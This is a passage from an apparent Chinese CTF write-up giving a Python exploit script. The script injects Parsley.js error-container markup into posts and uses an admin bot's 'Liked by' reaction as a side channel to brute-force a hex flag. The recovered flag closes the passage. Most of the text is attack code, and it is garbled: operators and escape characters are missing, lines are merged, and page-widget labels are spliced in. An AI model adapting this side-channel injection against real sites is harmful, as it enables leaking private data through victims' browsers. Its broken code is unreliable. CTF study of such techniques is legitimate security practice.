ArticleShare
在前端代码中得知:side channel attack
exp如下
``` import requests import time import sys
def main(host, port):
代码语言:javascript复制 s = requests.Session()
base_url = f"http://{host}:{port}/"
res = s.get(base_url)
pos = res.text.find('name="c" value="') len('name="c" value="')
csrftoken = res.text[pos:pos 16]
ss = "abcdef0123456789"
flag = ""
for i in range(16):
for j in ss:
print("trying",j)
payload = f'''<form data-parsley-validate>
<input data-parsley-required
data-parsley-trigger="blur"
data-parsley-error-message="<input type=button id=like>"
data-parsley-errors-container="a[href^='/lookup.php?id={flag j}']"
autofocus>
</form>'''
data = {'c': csrftoken, 'content': payload}
res = s.post(base_url "add.php", data=data, allow_redirects=False)
#print(res.headers)
location = res.headers['Location']
pos = location.find('id=') 3
wp = location[pos:]
data = {'c': csrftoken, 'id': wp}
res = s.post(base_url "admin.php", data=data)
time.sleep(10)
res = s.get(f"http://{host}:{port}/lookup.php?id={wp}")
txt = res.text.replace("n", "").replace("r", "")
if "Liked by</h3>admin" not in txt:
flag = j
print(i,flag)
breakif name == ‘main‘:
代码语言:javascript复制 main("********","*****")4. 如果中间出现没爆出来的就把前面爆出来的几位去掉最后一位,然后添加在flag前面继续爆就行
5. flag如下
6. ```
ctf{s1d3_ch4nn3l_attack_is_funny_bluecup2023_got_it}
